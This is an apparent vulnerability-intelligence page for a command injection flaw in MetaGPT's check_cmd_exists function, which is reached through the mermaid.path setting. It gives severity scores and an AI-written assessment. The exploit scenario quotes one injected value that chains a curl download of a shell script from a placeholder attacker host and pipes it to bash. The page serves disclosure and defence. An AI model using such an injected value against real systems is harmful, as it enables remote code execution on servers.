EUVD-2026-34985
GHSA-h4jg-8v58-57wj
Severity by source
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
A vulnerability was determined in FoundationAgents MetaGPT up to 0.8.2. Affected by this issue is the function check_cmd_exists of the file metagpt/utils/common.py. This manipulation of the argument mermaid.path causes command injection. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.
AnalysisAI
Command injection in FoundationAgents MetaGPT through version 0.8.2 allows a remote, low-privileged attacker to execute arbitrary OS commands by manipulating the mermaid.path configuration argument passed to the check_cmd_exists function in metagpt/utils/common.py. A publicly available proof-of-concept (documented on Notion) demonstrates exploitation; however, this is not listed in CISA KEV and the CVSS vector assigns high attack complexity (AC:H), tempering real-world exploitability. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an attacker to hold a low-privileged authenticated session with the MetaGPT application (PR:L per CVSS vector - unauthenticated exploitation is not supported by the available data). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 5.0 (Medium) reflects a balanced set of signals: AV:N confirms the attack is initiated remotely over a network, but AC:H indicates high complexity - meaning the attacker must navigate specific conditions or race states not always under their direct control. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with low-privileged authenticated access to a MetaGPT instance - for example, a team member or API user - supplies a crafted mermaid.path value such as '/usr/bin/mmdc; curl http://attacker.example/shell.sh | bash' through a configuration interface or API parameter. When MetaGPT internally calls check_cmd_exists with this unsanitized value, the shell interprets the injected commands, executing arbitrary code on the server under the MetaGPT process's OS identity. … |
| Remediation | No vendor-released patch has been identified at time of analysis; the upstream project has not responded to GitHub issue #2037 and remediation level is listed as unknown (RL:X) in the CVSS temporal vector. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today